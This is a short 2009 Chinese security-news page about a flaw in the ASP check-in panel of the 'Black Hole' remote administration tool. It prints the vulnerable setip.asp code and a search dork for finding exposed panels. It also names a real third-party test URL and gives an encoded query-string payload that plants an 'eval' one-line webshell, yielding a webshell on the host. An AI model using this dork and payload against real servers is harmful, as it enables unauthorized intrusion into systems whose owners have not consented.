pc软件 文章资讯 手机软件

您当前的位置→图文中心新闻资讯安全播报黑洞的ASP上线系统的一个漏洞
阅读排行

黑洞的ASP上线系统的一个漏洞


2009/7/12  编辑:佚名 来源:本站整理

在默认的情况下, 利用该漏洞可得到上线系统所在服务器的webshell

ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp

写入配置时对参数未作检查, setip.asp相关代码

<%

strIP=Trim(Request.QueryString("Ip"))

strPort=Trim(Request.QueryString("Port"))

strType=Trim(Request.QueryString("Type"))

if strType="0" then

strIP=Request.ServerVariables("REMOTE_HOST")

end if

sql="select * from Info where strMark='Main'"

rs.Open sql,conn,1,3

if not rs.eof or not rs.bof then

rs("strIPAddress")=strIP

rs("strPort")=strPort

rs("strType")=strType

rs.update

'不要修改下面的反馈字符.否则程序不知道是否更新成功.

response.write "update success!"

else

response.write "update fail!"

end if

set rs=nothing

conn.close

set conn=nothing

以“inurl:setip.asp”为关键字找了一个测试地址http://zomei.com/blackhole/setip.asp

提交

http://zomei.com/blackhole/setip.asp?Type=%A9%E0%B0Y%CE%DB%A0%84%9F%A8%94%B3%AC%9B%A1%C5%A1%D4%A9%CD%90%F7

这样就插入了EVAL一句话

相关文章

QQ飞车黑洞之眼视频评测_QQ飞车黑洞之眼多少钱:QQ飞车黑洞之眼视频评测_QQ飞车黑洞之眼多少钱qq飞车黑洞之眼多少钱?90q币qq飞车黑洞之眼属性:黑色的车身如同夜间的猛兽,结合全新空军技术的远程雷达让赛车提前做好一切准备,大尺寸轮胎让赛车具有更大的扭力,完美的成为赛道猛兽。

黑洞的ASP上线系统的一个漏洞:在默认的情况下,利用该漏洞可得到上线系统所在服务器的webshellASP上线系统中保存上线IP信息的数据库的扩展名默认为asp写入配置时对参数未作检查,setip.asp相关代码<%strIP=Trim(Request.QueryStri...。

谈"黑洞2001"杀防火墙的实现与对策:谈"黑洞2001"杀防火墙的实现与对策"黑洞2001"是今年1月份推出的国产远程管理工具,相对其它远程管理工具,它添加了个很有吸引力的功能:进程管家.它有什么用呢?在这里引述一下吴建蓉的论述:"多进程监控功能是干什么用的呢?原来随着大家安全...。

发表评论
网站帮助 - 广告合作 - 下载声明 - 网站地图